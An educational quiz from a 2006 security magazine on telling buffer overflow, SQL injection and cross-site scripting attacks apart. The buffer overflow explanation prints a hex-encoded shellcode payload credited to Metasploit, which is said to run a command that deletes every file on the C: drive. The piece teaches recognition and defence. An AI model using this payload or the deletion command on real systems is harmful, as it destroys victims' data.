Palisade Magazine
 
August 2006

Identifying buffer overflow attack

Quiz Graphic

An attacker enters a long nasty looking string into the date field. The input overwrites parts of the running program and executes commands on the server. What type of attack just took place?

  1. SQL Injection attack
  2. Buffer Overflow attack
  3. Cross Site Scripting attack

Click to view the answer →

The correct answer is 2) Buffer Overflow attack

In a SQL Injection attack, an attacker inputs specially crafted value in an input field that the application uses to construct a dynamic query to the database. This results in the query getting manipulated and more information being revealed to the attacker. We discuss the basics of SQL injection in the Learning Center. In Jun we analyzed how they affect stored procedures too, in the pages of Palisade.

In a buffer overflow attack, the input takes more space than allocated for the variable. It overflows the allocated buffer and overwrites adjacent memory locations. When the input is carefully crafted, it lets the attacker run commands of his choice. Here’s one such input, courtesy the Metasploit project. It executes the command:

del /Q /S /F c:\*.*

"\x33\xc9\x83\xe9\xda\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd8\xad\x5e \x3d\x83\xeb\xfc\xe2\xf4\x24\x45\x1a\x3d\xd8\xad\xd5\x78\xe4\x26\x22\x38 \xa0\xac\xb1\xb6\x97\xb5\xd5\x62\xf8\xac\xb5\x74\x53\x99\xd5\x3c\x36\x9c \x9e\xa4\x74\x29\x9e\x49\xdf\x6c\x94\x30\xd9\x6f\xb5\xc9\xe3\xf9\x7a\x39 \xad\x48\xd5\x62\xfc\xac\xb5\x5b\x53\xa1\x15\xb6\x87\xb1\x5f\xd6\x53\xb1 \xd5\x3c\x33\x24\x02\x19\xdc\x6e\x6f\xfd\xbc\x26\x1e\x0d\x5d\x6d\x26\x31 \x53\xed\x52\xb6\xa8\xb1\xf3\xb6\xb0\xa5\xb5\x34\x53\x2d\xee\x3d\xd8\xad \xd5\x55\xe4\xf2\x6f\xcb\xb8\xfb\xd7\xc5\x5b\x6d\x25\x6d\xb0\x5d\xd4\x39 \x87\xc5\xc6\xc3\x52\xa3\x09\xc2\x3f\xc9\x3b\x51\xf8\x82\x0f\x1d\xf7\xfe \x7e\x12\x9e\x8d\x3d\x07\x84\x87\x70\x17\xd8\xad\x5e\x3d"

Read our discussion on the techniques to prevent Buffer overflow in the back pages of Palisade.

A Cross site scripting or XSS attack is aimed at stealing sensitive user information like session tokens. A common attack method is to send a mail to the victim with a link to a valid site along with a javascript as part of the URL. When the victim clicks on the link, the browser executes the script which retrieves the user’s cookies and mails to the attacker. XSS was the topic of the April 2005 quiz.

by Sangita Pakala.